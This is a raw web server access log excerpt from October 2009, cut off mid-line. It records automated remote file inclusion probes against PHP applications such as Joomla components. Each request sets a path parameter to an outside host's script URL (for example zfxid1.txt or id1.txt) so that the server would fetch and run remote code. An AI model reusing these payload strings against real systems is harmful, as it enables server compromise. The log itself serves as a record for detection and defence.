209.126.189.35 - - [22/Oct/2009:02:00:43 -0400] "GET /logs/access_log.Q109070500%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.126.189.35 - - [22/Oct/2009:02:00:43 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:02:00:43 -0400] "GET /logs/error_log.Q109051200%20%20///zb41/include/write.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.29.26 - - [22/Oct/2009:02:00:44 -0400] "GET /logs/access_log.Q109080500//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.futu.co.kr/cgi-bin/id1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:02:00:56 -0400] "GET /playing.php/common/db.php?commonpath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:02:00:56 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:02:00:56 -0400] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:02:01:05 -0400] "GET ///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:02:01:05 -0400] "GET /logs///e404.php?INCLUDE_FOLDER=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:02:01:05 -0400] "